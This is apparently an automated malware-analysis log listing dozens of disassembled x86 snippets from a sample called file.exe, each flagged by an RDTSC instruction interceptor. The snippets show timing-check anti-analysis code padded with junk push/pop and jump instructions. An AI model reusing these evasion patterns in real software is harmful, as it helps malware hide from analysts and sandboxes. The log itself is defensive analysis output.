Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60AE0F second address: 60AE59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FCBA46BC749h 0x0000000b ja 00007FCBA46BC736h 0x00000011 jmp 00007FCBA46BC741h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jno 00007FCBA46BC736h 0x0000001f jmp 00007FCBA46BC73Bh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60AE59 second address: 60AE80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push edi 0x0000000c jp 00007FCBA4817E76h 0x00000012 pop edi 0x00000013 push ecx 0x00000014 jns 00007FCBA4817E76h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60AFD7 second address: 60AFDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60B142 second address: 60B15E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60BBF7 second address: 60BBFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 602FBD second address: 602FD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FCBA4817E82h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 602FD5 second address: 602FD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E20A5 second address: 5E20E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c jmp 00007FCBA4817E83h 0x00000011 popad 0x00000012 push edx 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FCBA4817E85h 0x0000001b pop edx 0x0000001c push edi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60C444 second address: 60C448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60F216 second address: 60F21A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60F21A second address: 60F220 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 612794 second address: 612798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 612C7F second address: 612C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 612DA9 second address: 612DAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6115A8 second address: 6115AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6115AE second address: 6115B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 612E98 second address: 612EBA instructions: 0x00000000 rdtsc 0x00000002 jno 00007FCBA46BC738h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FCBA46BC73Fh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 612EBA second address: 612EBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616B50 second address: 616B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616B58 second address: 616B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616B5E second address: 616B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA46BC746h 0x00000009 jo 00007FCBA46BC736h 0x0000000f popad 0x00000010 pop edx 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616B85 second address: 616B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616CE5 second address: 616CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616E3B second address: 616E68 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FCBA4817E89h 0x0000000c push edi 0x0000000d pop edi 0x0000000e jns 00007FCBA4817E76h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616E68 second address: 616E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616FDD second address: 616FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6175A1 second address: 6175AB instructions: 0x00000000 rdtsc 0x00000002 js 00007FCBA46BC736h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 618D08 second address: 618D13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FCBA4817E76h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 618D13 second address: 618D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b js 00007FCBA46BC744h 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007FCBA46BC736h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 618D2C second address: 618D42 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 or di, B341h 0x0000000c push 94D92880h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 619937 second address: 619976 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a mov esi, dword ptr [ebp+122D1C78h] 0x00000010 nop 0x00000011 jmp 00007FCBA46BC740h 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FCBA46BC741h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 619976 second address: 619988 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 619988 second address: 61998E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 619B64 second address: 619B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 619DA8 second address: 619DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61B322 second address: 61B326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61B969 second address: 61B97B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA46BC73Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61C35B second address: 61C3B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FCBA4817E88h 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FCBA4817E78h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c mov esi, dword ptr [ebp+122D3922h] 0x00000032 push 00000000h 0x00000034 mov esi, 48731DDCh 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61C1FC second address: 61C202 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61C3B5 second address: 61C3D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61C202 second address: 61C206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61C3D2 second address: 61C3D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61E450 second address: 61E455 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61CBE4 second address: 61CBE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61CBE8 second address: 61CBEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D4A4D second address: 5D4A53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61EADB second address: 61EAE1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61EAE1 second address: 61EAF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA4817E84h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61F588 second address: 61F5FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov di, bx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FCBA46BC738h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b jmp 00007FCBA46BC745h 0x00000030 or dword ptr [ebp+122D2773h], esi 0x00000036 push 00000000h 0x00000038 jmp 00007FCBA46BC749h 0x0000003d xchg eax, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 push ecx 0x00000041 pushad 0x00000042 popad 0x00000043 pop ecx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61F5FE second address: 61F617 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007FCBA4817E7Eh 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 621480 second address: 621510 instructions: 0x00000000 rdtsc 0x00000002 je 00007FCBA46BC736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c jmp 00007FCBA46BC740h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007FCBA46BC738h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov esi, ebx 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edx 0x00000033 call 00007FCBA46BC738h 0x00000038 pop edx 0x00000039 mov dword ptr [esp+04h], edx 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc edx 0x00000046 push edx 0x00000047 ret 0x00000048 pop edx 0x00000049 ret 0x0000004a mov dword ptr [ebp+122D27EBh], ecx 0x00000050 push 00000000h 0x00000052 mov dword ptr [ebp+122D2BA9h], esi 0x00000058 xchg eax, ebx 0x00000059 jmp 00007FCBA46BC744h 0x0000005e push eax 0x0000005f js 00007FCBA46BC74Fh 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 pop eax 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 620712 second address: 620716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 621D93 second address: 621D98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62730A second address: 627310 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 627310 second address: 627380 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCBA46BC73Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FCBA46BC738h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edx 0x0000002c call 00007FCBA46BC738h 0x00000031 pop edx 0x00000032 mov dword ptr [esp+04h], edx 0x00000036 add dword ptr [esp+04h], 00000016h 0x0000003e inc edx 0x0000003f push edx 0x00000040 ret 0x00000041 pop edx 0x00000042 ret 0x00000043 mov ebx, 04D39903h 0x00000048 cmc 0x00000049 jne 00007FCBA46BC738h 0x0000004f push 00000000h 0x00000051 mov dword ptr [ebp+1244DF87h], ebx 0x00000057 xchg eax, esi 0x00000058 push edi 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 626364 second address: 626369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 627380 second address: 62739F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCBA46BC745h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 626369 second address: 626389 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b jp 00007FCBA4817E7Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 628442 second address: 628447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 628447 second address: 62845A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCBA4817E78h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62845A second address: 62845E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62845E second address: 628468 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FCBA4817E76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62A59E second address: 62A5AB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCBA46BC736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62A734 second address: 62A7C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 nop 0x00000008 mov di, EC62h 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov edi, ecx 0x00000015 mov dword ptr fs:[00000000h], esp 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007FCBA4817E78h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 and ebx, 3BDCC548h 0x0000003c xor edi, dword ptr [ebp+122D1825h] 0x00000042 mov eax, dword ptr [ebp+122D02B9h] 0x00000048 push 00000000h 0x0000004a push edi 0x0000004b call 00007FCBA4817E78h 0x00000050 pop edi 0x00000051 mov dword ptr [esp+04h], edi 0x00000055 add dword ptr [esp+04h], 00000016h 0x0000005d inc edi 0x0000005e push edi 0x0000005f ret 0x00000060 pop edi 0x00000061 ret 0x00000062 sub bh, FFFFFFA7h 0x00000065 push FFFFFFFFh 0x00000067 call 00007FCBA4817E7Fh 0x0000006c mov edi, dword ptr [ebp+122D279Ch] 0x00000072 pop ebx 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 push esi 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62A7C0 second address: 62A7C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62C966 second address: 62C96D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62E7CF second address: 62E7FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCBA46BC746h 0x00000008 jnp 00007FCBA46BC736h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnl 00007FCBA46BC738h 0x0000001a push eax 0x0000001b pop eax 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62F784 second address: 62F789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 630731 second address: 630737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 630737 second address: 630761 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007FCBA4817E78h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 630761 second address: 6307CA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FCBA46BC738h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 jmp 00007FCBA46BC73Ah 0x00000028 push 00000000h 0x0000002a mov di, 9F92h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007FCBA46BC738h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 0000001Dh 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a mov di, si 0x0000004d push eax 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 push edx 0x00000052 pop edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 632E35 second address: 632E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 633CA6 second address: 633D11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push ebx 0x0000000d xor ebx, dword ptr [ebp+122D3926h] 0x00000013 pop ebx 0x00000014 push 00000000h 0x00000016 mov di, si 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007FCBA46BC738h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 0000001Ah 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 movsx ebx, dx 0x00000038 mov edi, dword ptr [ebp+1244B235h] 0x0000003e xchg eax, esi 0x0000003f jmp 00007FCBA46BC743h 0x00000044 push eax 0x00000045 je 00007FCBA46BC748h 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 633D11 second address: 633D15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6308F2 second address: 630908 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCBA46BC73Ch 0x00000008 jnl 00007FCBA46BC736h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 635D28 second address: 635DBC instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCBA4817E76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FCBA4817E78h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+122D388Eh] 0x0000002b call 00007FCBA4817E82h 0x00000030 jnl 00007FCBA4817E7Ch 0x00000036 pop edi 0x00000037 push 00000000h 0x00000039 jmp 00007FCBA4817E84h 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push edi 0x00000043 call 00007FCBA4817E78h 0x00000048 pop edi 0x00000049 mov dword ptr [esp+04h], edi 0x0000004d add dword ptr [esp+04h], 00000017h 0x00000055 inc edi 0x00000056 push edi 0x00000057 ret 0x00000058 pop edi 0x00000059 ret 0x0000005a mov bl, ah 0x0000005c xchg eax, esi 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 jg 00007FCBA4817E76h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 635DBC second address: 635DC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 630908 second address: 63090F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 635DC0 second address: 635DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
